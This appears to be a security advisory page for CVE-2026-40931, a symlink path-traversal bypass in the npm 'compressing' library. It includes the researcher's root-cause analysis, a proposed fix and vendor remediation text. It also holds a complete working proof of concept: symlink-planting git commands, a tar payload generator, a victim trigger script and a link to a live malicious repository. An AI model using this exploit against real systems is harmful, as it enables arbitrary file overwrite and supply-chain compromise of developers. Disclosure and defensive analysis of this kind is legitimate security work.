Summary
1. Executive Summary
This report documents a critical security research finding in the compressing npm package (specifically tested on the latest v2.1.0). The core vulnerability is a Partial Fix Bypass of CVE-2026-24884.
The current patch relies on a purely logical string validation within the isPathWithinParent utility. This check verifies if a resolved path string starts with the destination directory string but fails to account for the actual filesystem state. By exploiting this "Logical vs. Physical" divergence, we successfully bypassed the security check using a Directory Poisoning technique (pre-existing symbolic links).
Key Findings:
- Vulnerable Component:
lib/utils.js->isPathWithinParent() - Flaw Type: Incomplete validation (lack of recursive
lstatchecks). - Primary Attack Vector: Supply Chain via Git Clone The attack requires zero victim interaction beyond standard developer workflow (
git clone+node app.js). Git natively preserves symlinks during clone, automatically deploying the malicious symlink to victim's machine without any additional attacker access. - Result: Successfully achieved arbitrary file writes outside the intended extraction root on the latest library version.
2. Deep-Dive: Technical Root Cause Analysis
The vulnerability exists because of a fundamental disconnect between how the library validates a path and how the Operating System executes a write to that path.
1. Logical Abstraction (The "String" World)
The developer usespath.resolve(childPath)to sanitize input. In Node.js,path.resolveis a literal string manipulator. It calculates an absolute path by processing..and.segments relative to each other.The Limitation:
path.resolvedoes NOT look at the disk. It does not know if a folder namedconfigis a real folder or a symbolic link.The Result: If the extraction target is
/app/outand the entry is config/passwd,path.resolvereturns/app/out/config/passwd. Since this string starts with/app/out/, the security check returns TRUE.2. Physical Reality (The "Filesystem" World)
When the library proceeds to write the file usingfs.writeFile('/app/out/config/passwd', data), the execution is handed over to the Operating System's filesystem kernel.The Redirection: If the attacker has pre-created a symbolic link on the disk at
/app/out/configpointing to/etc, the OS kernel sees the write request and follows the link.The Divergence: The OS resolves the path to
/etc/passwd. The "Security Guard" (the library) thought it was writing to a local config folder, but the "Executioner" (the OS) followed the link into a sensitive system area.3. Visual Logic Flow
4. Comparison with Industry Standards (
node-tar)
A secure implementation (likenode-tar) uses an "Atomic Check" strategy. Instead of trusting a string path, it iterates through every directory segment and callsfs.lstatSync(). If any segment is found to be a symbolic link, the extraction is halted immediately before any write operation is attempted.compressinglacks this critical recursive verification step.5. Git Clone as a Delivery Mechanism: Git treats symlinks as first-class objects and restores them faithfully during clone. This means an attacker-controlled repository becomes a reliable delivery mechanism, the symlink is "pre-planted" automatically by git itself, removing any prerequisite of prior system access.
3. Comprehensive Attack Vector & Proof of Concept
PoC Overview: The Git Clone Vector This exploit leverages the fact that Git natively preserves symbolic links. By cloning a malicious repository, a victim unknowingly plants a "poisoned path" on their local disk. Why this is critical:
- No social engineering required beyond a standard git clone.
- The symlink is "pre-planted" by Git itself, removing the need for prior system access.
- Victim's workflow remains indistinguishable from legitimate activity.
Step 1: Environment Preparation (Victim System)
TIP
Prerequisite: Ensure you have Node.js and npm installed on your Kali Linux. If you encounter a MODULE_NOT_FOUND error for tar-stream or compressing, run: npm install [email protected] tar-stream` in your current working directory.
Create a mock sensitive file to demonstrate the overwrite without damaging the actual OS.
# Workspace setup
mkdir -p ~/poc-workspace
cd ~/poc-workspace
# 1. Create a fake sensitive file
mkdir -p /tmp/fake_root/etc
echo "root:SAFE_DATA_DO_NOT_OVERWRITE" > /tmp/fake_root/etc/passwd
# 2. Install latest vulnerable library
npm install [email protected] tar-stream
Step 2: Attacker Side (Repo & Payload)
2.1 Create the poisoned GitHub Repository
- Create a repo named
compressing_poc_teston GitHub. - On your local machine, setup the malicious content:
mkdir compressing_poc_test
cd compressing_poc_test
git init
# CREATE THE TRAP: A symlink pointing to the sensitive target
ln -s /tmp/fake_root/etc/passwd config_file
# Setup Git
git branch -M main
git remote add origin https://github.com/USERNAME/compressing_poc_test.git
2.2 Generate the Malicious Payload
Create a script gen_payload.js inside the parent folder (~/poc-workspace) to generate the exploit file:
const tar = require('tar-stream');
const fs = require('fs');
const pack = tar.pack();
// PAYLOAD: A plain file that matches the symlink name
pack.entry({ name: 'config_file' }, 'root:PWNED_BY_THE_SUPPLY_CHAIN_ATTACK_V2.1.0\n');
pack.finalize();
pack.pipe(fs.createWriteStream('./payload.tar'));
console.log('payload.tar generated successfully!');
Run the script to create the payload:
node gen_payload.js
This will create a payload.tar file in your current directory.
2.3 Push Bait & Payload to GitHub
Now, move the generated payload into your repo folder and push everything to GitHub:
# Move the payload into the repo folder
mv ../payload.tar .
# Add all files (config_file symlink and payload.tar)
git add .
git commit -m "Add project updates and resource assets"
git push -u origin main
For your convenience and easy reproduction, I have already created a malicious repository to simulate the attacker's setup. You can clone it directly without needing to create a new one: https://github.com/sachinpatilpsp/compressing_poc_test.git
Step 3: Victim Side (The Compromise)
The victim clones the repo and runs an application that extracts the included payload.tar.
# 1. Simulate a developer cloning the repo
cd ~/poc-workspace
# In a real attack, the victim clones from your GitHub URL
git clone https://github.com/USERNAME/compressing_poc_test.git victim_app
cd victim_app
# 2. Create the Trigger script (victim_app.js)
cat <<EOF > victim_app.js
const compressing = require('compressing');
async function extractUpdate() {
console.log('--- Victim: Extracting Update Package ---');
try {
// This triggers the bypass because 'config_file' already exists as a symlink
await compressing.tar.uncompress('./payload.tar', './');
console.log('[+] Update Successful!');
} catch (err) {
console.error('[-] Error:', err);
}
}
extractUpdate();
EOF
# 3. VERIFY THE OVERWRITE
echo "--- Before Exploit ---"
cat /tmp/fake_root/etc/passwd
# 4. Run the victim_app.js
node victim_app.js
# 5. After Exploit Run
echo "--- After Exploit ---"
cat /tmp/fake_root/etc/passwd
Why this bypass works
- The Library's Logic:
compressingusespath.resolveon entry names and compares them string-wise with the destination directory. - The Gap: Because
path.resolvedoes not check if intermediate directories are symlinks on disk, it treatsconfig_file(the symlink) as a normal path inside the allowed directory. - The Result: The underlying
fs.writeFilefollows the existing symlink to the protected target (/tmp/fake_root/etc/passwd), bypassing all string-based security checks.
4. Impact Assessment
What kind of vulnerability is it?
This is an Arbitrary File Overwrite vulnerability caused by a Symlink Path Traversal bypass. Specifically, it is a "Partial Fix" bypass where a security patch meant to prevent directory traversal only validates path strings but ignores the filesystem state (symlinks).
Who is impacted?
1. Developers & Organizations: Any user of the compressing library (up to v2.1.0) who extracts untrusted archives into a working directory.
2. Supply Chain via Git Clone (Primary Vector): Git natively restores symlinks during git clone. An attacker who controls or compromises any upstream repository can embed malicious symlinks. The victim's only required action is standard developer workflow clone and run. No social engineering or extra steps needed beyond trusting a repository.
3. Privileged Environments: Systems where the extraction process runs as a high-privilege user (root/admin), as it allows for the overwriting of sensitive system files like /etc/passwd or /etc/shadow.
Impact Details
- Privilege Escalation: Gaining root access by overwriting system configuration files.
- Remote Code Execution (RCE): Overwriting executable binaries or startup scripts (.bashrc, .profile) to run malicious code upon the next boot or login.
- Data Corruption: Permanent loss or modification of application data and database files.
- Reputational Damage to Library: Loss of trust in the compressing library's security architecture due to an incomplete patch for a known CVE.
5. Technical Remediation & Proposed Fix
To completely fix this vulnerability, the library must transition from String-based validation to State-aware validation.
1. The Vulnerable Code (Current Incomplete Patch)
The current logic in lib/utils.js only checks the path string:
// [VULNERABLE] Does not check if disk segments are symlinks
function isPathWithinParent(childPath, parentPath) {
const normalizedChild = path.resolve(childPath);
const normalizedParent = path.resolve(parentPath);
// ... (omitted startsWith check)
return normalizedChild.startsWith(parentWithSep);
}
2. The Proposed Fix (Complete Mitigation)
The library must recursively check every component of the path on the disk using fs.lstatSync to ensure no component is a symbolic link that redirects to a location outside the root.
const fs = require('fs');
const path = require('path');
/**
* SECURE VALIDATION: Checks every segment of the path on disk
* to prevent symlink-based directory poisoning.
*/
function secureIsPathWithinParent(childPath, parentPath) {
const absoluteDest = path.resolve(parentPath);
const absoluteChild = path.resolve(childPath);
// Basic string check first
if (!absoluteChild.startsWith(absoluteDest + path.sep) &&
absoluteChild !== absoluteDest) {
return false;
}
// RECURSIVE DISK CHECK
// Iteratively check every directory segment from the root to the file
let currentPath = absoluteDest;
const relativeParts = path.relative(absoluteDest, absoluteChild).split(path.sep);
for (const part of relativeParts) {
if (!part || part === '.') continue;
currentPath = path.join(currentPath, part);
try {
const stats = fs.lstatSync(currentPath);
// IF ANY COMPONENT IS A SYMLINK, REJECT IT
if (stats.isSymbolicLink()) {
throw new Error(`Security Exception: Symlink detected at ${currentPath}`);
}
} catch (err) {
if (err.code === 'ENOENT') break; // Path doesn't exist yet, which is fine
throw err;
}
}
return true;
}
3. Why and How it works:
- Filesystem Awareness: Unlike the previous fix, this code uses
fs.lstatSync. It doesn't trust the string; it asks the Operating System, "What is actually at this location?". - Segmented Verification: By splitting the path and checking each part (
config, thenconfig/file), it catches the "Poisoned Directory" (config -> /etc) before the final write happens. - Bypass Prevention: Even if the string check passes, the loop will detect the symlink at the
configsegment and throw a security exception, stopping thefs.writeFilebefore it can follow the link to/etc/passwd. - Atomic Security: This implementation ensures that the logical path and the physical path are identical, leaving no room for "Divergence" exploits.
Note: For production, it is recommended to use the asynchronous fs.promises.lstat to prevent blocking the Node.js event loop during recursive checks.
Impact
CVE-2026-40931 has a CVSS score of 8.4 (High). The vector is requires local access, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.1.1, 1.10.5); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
compressing to 2.1.1 or later; compressing to 1.10.5 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-40931? CVE-2026-40931 is a high-severity security vulnerability in compressing (npm), affecting versions >= 2.0.0, <= 2.1.0. It is fixed in 2.1.1, 1.10.5.
- How severe is CVE-2026-40931? CVE-2026-40931 has a CVSS score of 8.4 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of compressing are affected by CVE-2026-40931? compressing (npm) versions >= 2.0.0, <= 2.1.0 is affected.
- Is there a fix for CVE-2026-40931? Yes. CVE-2026-40931 is fixed in 2.1.1, 1.10.5. Upgrade to this version or later.
- Is CVE-2026-40931 exploitable, and should I be worried? Whether CVE-2026-40931 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-40931 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40931?
- Upgrade
compressingto 2.1.1 or later - Upgrade
compressingto 1.10.5 or later
- Upgrade